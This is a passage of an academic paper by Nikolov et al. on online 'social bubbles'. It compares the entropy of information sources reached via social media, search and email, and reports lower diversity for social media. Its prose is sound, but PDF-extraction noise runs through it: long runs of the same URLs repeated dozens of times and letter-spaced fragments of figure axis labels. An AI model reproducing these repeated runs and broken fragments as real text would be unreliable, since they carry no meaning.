probabilities as we have done above, the entropy gives the uncertainty in the websites that will be Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 6/14 https://peerj.com/computer-science/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://dx.doi.org/10.7717/peerj-cs.38 Table 3 Blogging platforms, Wiki platforms and news aggregators filtered out of the list of news sites. Blogging platforms Wiki platforms News aggregators blogger.com wikipedia.org news.aol.com blogspot.com wictionary.org news.google.com hubpages.com wikibooks.org news.yahoo.com livejournal.com wikidata.org tumblr.com wikimediafoundation.org typepad.com wikinews.org wordpress.com wikiquote.org wordpress.org wikisource.org xanga.com wikiversity.org wikivoyage.org accessed given a category of referrers. By measuring diversity over a set of domains, our approach captures the intuition that visiting 10 pages (for example, news articles) from 10 different sites implies a more diverse exposure than visiting 10 pages from the same site. The implications of this assumption are further debated in the ‘Discussion’ section. We considered an alternative method of measuring diversity based on the Gini coefficient (Sen, 1973), and found the results discussed below to be robust with respect to the choice of diversity measure. The traffic volume in our click dataset varies significantly over time and across the three categories, as shown in Fig. 2A. A similar pattern emerges for the dataset of news targets (see inset). These vast volume differences make it necessary to understand the relationship between traffic volume and the diversity of an information source. To do so, we measure the diversity over samples of increasing numbers of clicks. From Fig. 2B we see that the diversity measurements indeed depend on volume, especially for small numbers of clicks; as the volume increases, the diversity tends to plateau. However, the dependence of diversity on number of clicks is different for each category of traffic. Therefore, instead of normalizing each category of traffic by a separate normalization curve, we account for the dependence by using the same number of clicks. This makes our approach easier to generalize to more categories and datasets, since it does not require the fitting of a separate curve to each case. We compute the diversity over traffic samples of the same size (50,000 clicks per month for all targets, and 1,000 clicks per month for news targets) for each category in our analysis. Auxiliary datasets In the second part of our analysis we make use of two auxiliary datasets to disentangle the relationship between collective diversity—as seen in the targets accessed by a community of users—and individual diversity—as seen in the targets accessed by a single user. From both datasets, we are able to recover a referring website, a target website, and an associated user identifier. Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 7/14 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.38 O ct 0 6 D ec 0 6 Fe b 0 7 A p r 0 7 Ju l 0 7 S ep 0 7 N ov 0 7 Ja n 0 8 M ar 0 8 M ay 0 8 Ju l 0 8 S ep 0 8 N ov 0 8 A p r 0 9 Ju n 0 9 A u g 0 9 O ct 0 9 D ec 0 9 Fe b 1 0 A p r 1 0 0 1 2 3 4 5 C li c k s (M il li o n s) Mail Social Media Search 0.00 0.02 0.04 0.06 0.08 0.10 0.12 News a 100 101 102 103 104 105 106 107 108 Clicks 0 2 4 6 8 10 12 14 E n tr o p y Mail Social Media Search 100 101 102 103 104 105 106 107 0 2 4 6 8 10 12 News b Figure 2 Dependence of entropy on traffic volume. (A) Traffic volume as a function of time for three different sources. (B) Entropy as a function of traffic volume. Error bars become negligibly small at 400 clicks, and are omitted for clarity. With fewer than 400 clicks, the entropy for the different categories is not significantly different. The insets show click volume and entropy for news traffic (same scale if not shown). AOL search logs In the search dataset we have information about search engine sessions from a period of three months in 2006, containing over 18 million clicks by over half a million users of the AOL search engine. Twitter posts In the social media dataset we have a sample of almost 1.3 billion public posts containing links shared by over 89 million people on Twitter during a period of 13 months between April 2013 and April 2014. This data was obtained from the Twitter streaming API (https://dev.twitter.com/streaming/overview). We treat these records as proxies for clicks, assuming that users have visited the shared pages. RESULTS Figure 3A presents our main finding: the diversity of targets reached from social media is significantly lower than those reached from search engine traffic, for all traffic as well as news targets (inset). This result holds for both second- and third-level domains, and is consistent with results obtained using an alternative measures of diversity. The observed differences in diversity did not change significantly over a period of three and a half years (see Fig. 3B). This empirical evidence suggests that social media expose the community to a narrower range of information sources, compared to a baseline of information seeking activities. Figure 4 illustrates the top targets of traffic from search and social media on a typical week. The diversity of targets reached via email also seems to be higher than that of social media, however the difference is smaller and its statistical significance is weaker due to the larger noise in the data. The difference in entropy is larger and more significant for traffic from email sources to news targets. While we wish to ultimately understand the biases experienced by individuals, the diversity measurements based on anonymous traffic data do not distinguish between users, and therefore they reveal a collective social bubble, as illustrated in Figs. 1C and 1D. It is Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 8/14 https://peerj.com/computer-science/ https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview http://dx.doi.org/10.7717/peerj-cs.38 Mail Social Media Search 6.0 7.5 9.0 10.5 12.0 E n tr o p y 3 4 5 6 7 8 9 News aaaaaa O ct 0 6 D ec 0 6 Fe b 0 7 A p r 0 7 Ju l 0 7 S ep 0 7 N ov 0 7 Ja n 0 8 M ar 0 8 M ay 0 8 Ju l 0 8 S ep 0 8 M ar 0 9 Ju n 0 9 A u g 0 9 O ct 0 9 D ec 0 9 Fe b 1 0 A p r 1 0 7 8 9 10 11 12 13 14 Mail Social Media Search 6.0 6.5 7.0 7.5 8.0 8.5 9.0 9.5 10.0 News b Figure 3 Diversity of sources accessed by different online activities. (A) Overall entropy for different traffic categories over the full range of data (Oct 2006–May 2010). Each box represents the range of data between the 25th and 75th percentiles. The top and bottom whiskers show the 99th and 1st percentiles, respectively. The horizontal line and the hollow point inside each box mark the median and mean entropy, respectively. The filled points are outliers. The uncertainty was computed over data points representing the clicks that occurred over one calendar month. (B) Entropy as a function of time. We smooth the data by applying a running average over a three-month sliding window that moves in increments of one month. Error bars are negligibly small and thus omitted. The insets plot the entropy for news traffic (same scale if not shown). at first sight unclear whether the collective bubble implies individual bubbles, or tells us anything at all about individual exposure. The number of clicks per user, or even the number of users could vary to produce different individual diversity patterns resulting in the same collective diversity. In theory, high collective diversity could be consistent with low individual diversity, and vice versa. Therefore we must investigate the relationship between collective and individual diversity measurements. To this end, we analyze the two auxiliary datasets where user information is preserved (see ‘Methods’). For both datasets, we measure the diversity for individual users, and collectively disregarding user labels. The strong correlation between collective diversity and average user diversity (Fig. 5) suggests that our results relate not only to a collective bubble, but also to individual social bubbles, as illustrated in Figs. 1A and 1B. DISCUSSION We have presented evidence that the diversity of information reached through social media is significantly lower than through a search baseline. As the social media role in supporting information diffusion increases, there is also an increased danger of reinforcing our collective filter bubble. A similar picture emerges when we specifically look at news traffic—the diversity of social media communication is significantly lower than that of search and inter-personal communication. Given the importance of news consumption to civic discourse, this finding is especially relevant to the filter bubble hypothesis. Our results suggest that social bubbles exist at the individual level as well, although our evidence is based on the relationship between collective and individual diversity and therefore indirect. Analysis of traffic data with (anonymized) user identifiers will be necessary to confirm this conclusively. In addition, these results apply to the population of Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 9/14 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.38 Figure 4 Top websites that are targets of 40% of clicks for search (A) and social media (B). This illustration refers to a typical week, with entropy close to (within one standard deviation from) average. The area of each rectangle is proportional to the number of clicks to that target. While these websites reflect the sample of users from Indiana University as well as the time when the data was collected, these contexts apply to both categories of traffic. Therefore the higher concentration of social media traffic on a small number of targets is meaningful. users from Indiana University during the time period when the data was collected—from late 2006 to mid 2010. Repeating these experiments on other populations would be beneficial to establish the generality of our findings. Indeed, the social media and search landscapes have changed since 2010 and how that affects the diversity of information exposure for people is an interesting question for ongoing research. Further research is also needed to tease out the influence of social versus algorithmic effects. Both are present in systems like Facebook—the algorithmic effect has to do with how a platform populates the feed for each user, which can be determined by a variety of individual and collective signals such as past social interactions and popularity. It seems Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 10/14 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.38 Figure 5 Correlation between collective and average individual entropy. Each point corresponds to an equal-size sample of links for each of a set of users sampled during a period of one day, to avoid volume bias in the entropy measurements. (A) Users sampled from search engine logs and their clicks (Pearson’s r = 0.8). We sampled 60 clicks from each of 50 users per day. (B) Users sampled from Twitter and their shared links (r = 0.8). We sampled 10 links from each of 10,000 users per day. unlikely that the relationship between algorithmic and social effects can be extracted from traces of online behavior as done here, without conducting controlled user studies. These results also come with the caveat that in our analysis we do not try to quantify the diversity inside each domain. We are assuming that the diversity of content is higher across different domains than across the pages within a single domain. The problem of quantify- ing the diversity of the content inside a single domain is a significant research problem in its own right, and one that would greatly benefit this and similar lines of research. Quantifying domain diversity will likely need to be tackled by looking at the content of individual pages as other measures, such as the number of sub-domains or the number of pages inside the domain, are more indicative of size and popularity, but not necessarily of diversity. Finally, in our study all social media traffic and all search traffic is merged. Further work is needed to tease out possible differences in diversity of information accessed through distinct search and social platforms. The social media platforms that exist today have important differences in functionality, and it will be worthwhile to investigate whether all these services under the umbrella of social media have similar properties when it comes to diverse information exposure. CONCLUSION Our findings provide the first large-scale empirical comparison between the diversity of information sources reached through different types of online activity. The traffic dataset gives us a unique opportunity to carry out this analysis. We are not aware of any other methods, based on publicly available data, for contrasting different information access patterns produced by the same set of users, in the same time period. While we have found quantitative support of online social bubbles, the question of whether our reliance on technology for information access is fostering polarization and Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 11/14 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.38 misinformation remains open. Even with ample anecdotal evidence (Mervis, 2014), we have yet to fully comprehend how today’s technology biases exposure to information. ACKNOWLEDGEMENT We are grateful to Mark Meiss for collecting the web traffic dataset used in this paper. ADDITIONAL INFORMATION AND DECLARATIONS Funding This manuscript is based upon work supported in part by the James S. McDonnell Foundation and the National Science Foundation (award CCF-1101743). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: James S. McDonnell Foundation. National Science Foundation: CCF-1101743. Competing Interests Filippo Menczer is an Academic Editor for PeerJ Computer Science. The other authors declare there are no competing interests. Author Contributions • Dimitar Nikolov and Diego F.M. Oliveira conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Alessandro Flammini and Filippo Menczer conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The Click Collection System Dataset from the IU School of Informatics and Computing restricts the access and use of this dataset for research purposes only, and requires all interested parties to submit a formal request at http://cnets.indiana.edu/groups/nan/ webtraffic/click-dataset/. REFERENCES Adamic L, Glance N. 2005. The political blogosphere and the 2004 US election: divided they blog. In: LinkKDD’05: proceedings of the 3rd international workshop on Link discovery. 36–43. An J, Quercia D, Cha M, Gummadi K, Crowcroft J. 2014. Sharing political news: the balancing act of intimacy and socialization in selective exposure. EPJ Data Science 3:Article 12 DOI 10.1140/epjds/s13688-014-0012-2. Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 12/14 https://peerj.com/computer-science/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://dx.doi.org/10.1140/epjds/s13688-014-0012-2 http://dx.doi.org/10.7717/peerj-cs.38 Bakshy E, Messing S, Adamic L. 2015. Exposure to ideologically diverse news and opinion on facebook. Science. Bakshy E, Rosenn I, Marlow C, Adamic L. 2012. The role of social networks in information diffusion. In: Proceedings of the 21st international conference on world wide web, WWW’12. New York: ACM, 519–528. Baron J. 2000. Thinking and deciding. 3rd edition. New York: Cambridge University Press. Conover M, Ratkiewicz J, Francisco M, Gonçalves B, Flammini A, Menczer F. 2011. Political polarization on twitter. In: Proceedings of the 5th international AAAI conference on weblogs and social media (ICWSM). Conover MD, Gonçalves B, Flammini A, Menczer F. 2012. Partisan asymmetries in online political activity. EPJ Data Science 1:Article 6 DOI 10.1140/epjds6. Doris-Down A, Versee H, Gilbert E. 2013. Political blend: an application designed to bring people together based on political differences. In: Proceedings of the 6th international conference on communities and technologies. New York: ACM, 120–130. Flaxman S, Goel S, Rao JM. 2013. Ideological segregation and the effects of social media on news consumption. In: SSRN Scholarly Paper ID 2363701. New York: Social Science Research Network. Fortunato S, Flammini A, Menczer F, Vespignani A. 2006. Topical interests and the mitigation of search engine bias. Proceedings of the National Academy of Sciences of the United States of America 103(34):12684–12689 DOI 10.1073/pnas.0605525103. Gilbert E, Bergstrom T, Karahalios K. 2009. Blogs are echo chambers: blogs are echo chambers. In: Proceedings of HICSS. Piscataway: IEEE, 1–10. Google. 2009a. Introducing google social search: I finally found my friend’s New York blog! Available at http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html (accessed 6 January 2015). Google. 2009b. Personalized search for everyone. Available at http://googleblog.blogspot.com/2009/ 12/personalized-search-for-everyone.html (accessed 25 August 2014). Graells-Garrido E, Lalmas M, Quercia D. 2013. Data portraits: connecting people of opposing views. Technical Report. ArXiv preprint. arXiv:1311.4658. Grevet C, Terveen LG, Gilbert E. 2014. Managing political differences in social media. In: Proceedings of the 17th ACM conference on computer supported cooperative work & social computing. New York: ACM, 1400–1408. Hart W, Albarracı́n D, Eagly AH, Brechan I, Lindberg MJ, Merrill L. 2009. Feeling validated versus being correct: a meta-analysis of selective exposure to information. Psychological Bulletin 135(4):555–588 DOI 10.1037/a0015701. Hosanagar K, Fleder D, Lee D, Buja A. 2013. Will the global village fracture into tribes? Recommender systems and their effects on consumer fragmentation. Management Science 60(4):805–823 DOI 10.1287/mnsc.2013.1808. Kastenmüller A, Greitemeyer T, Jonas E, Fischer P, Frey D. 2010. Selective exposure: the impact of collectivism and individualism. British Journal of Social Psychology 49(4):745–763 DOI 10.1348/014466609X478988. Koutra D, Bennett P, Horvitz E. 2014. Events and controversies: influences of a shocking news event on information seeking. Technical Report. ArXiv preprint. arXiv:1405.1486. Matsa KE, Mitchell A. 2014. 8 key takeaways about social media and news. Available at http:// www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ (accessed 3 September 2014). Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 13/14 https://peerj.com/computer-science/ http://dx.doi.org/10.1140/epjds6 http://dx.doi.org/10.1073/pnas.0605525103 http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/10/introducing-google-social-search-i.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://googleblog.blogspot.com/2009/12/personalized-search-for-everyone.html http://arxiv.org/abs/1311.4658 http://dx.doi.org/10.1037/a0015701 http://dx.doi.org/10.1287/mnsc.2013.1808 http://dx.doi.org/10.1348/014466609X478988 http://arxiv.org/abs/1405.1486 http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ http://www.journalism.org/2014/03/26/8-key-takeaways-about-social-media-and-news/ 